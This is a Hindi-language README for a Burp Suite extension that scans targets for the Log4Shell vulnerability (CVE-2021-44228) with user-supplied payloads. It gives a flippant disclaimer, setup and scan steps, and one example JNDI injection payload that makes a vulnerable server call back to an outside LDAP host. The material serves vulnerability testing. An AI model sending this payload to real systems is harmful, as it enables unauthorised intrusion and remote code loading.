Burp एक्सटेंशन जो Log4Shell (CVE-2021-44228) कमजोरी को कस्टम पेलोड के साथ स्कैन करता है।
अस्वीकरण
मैं आपके कार्यों, burp-suite के फ्रीज़ होने, लक्ष्य के हैक होने, थर्मोन्यूक्लियर युद्ध, या इन निर्देशों का पालन करने से उत्पन्न वर्तमान आर्थिक संकट के लिए जिम्मेदार नहीं हूँ। आप इस उपकरण का उपयोग करना चुन रहे हैं, और यदि आप कुछ भी गड़बड़ करने के लिए मेरी ओर उंगली उठाएंगे, तो मैं आप पर हँसूँगा।
निर्देश:
एक्सटेंशन को या तो पहले से संकलित रिलीज़ से इंस्टॉल करें या स्रोत से बनाएँ।
अन्य सभी सक्रिय स्कैनिंग एक्सटेंशन जैसे active scan++, burp bounty pro, param-miner आदि को अक्षम/अनचेक करें।
शीर्ष मेनू से Log4J Scanner की सेटिंग खोलें।
अपना कस्टम पेलोड जोड़ें और सेटिंग सहेजें।
अपने लक्ष्य का चयन करें > राइट-क्लिक करें > Scan करें।
Scan Configuration > Select from library चुनें।
केवल Audit checks - extensions only चुनें और OK बटन दबाएँ।
Silent Signal को विशेष धन्यवाद, इस एक्सटेंशन से निर्देश और स्कैन कॉन्फ़िगरेशन प्रेरित हैं।
याद रखने योग्य महत्वपूर्ण निर्देश:
अपने कस्टम पेलोड में अपना collaborator url न जोड़ें, बस [collaborator-server] को प्लेसहोल्डर के रूप में जोड़ें,
[collaborator-server को आपके collaborator सर्वर url से बदल दिया जाएगा।
उदाहरण पेलोड: "${jndi:ldap://[collaborator-server]/a}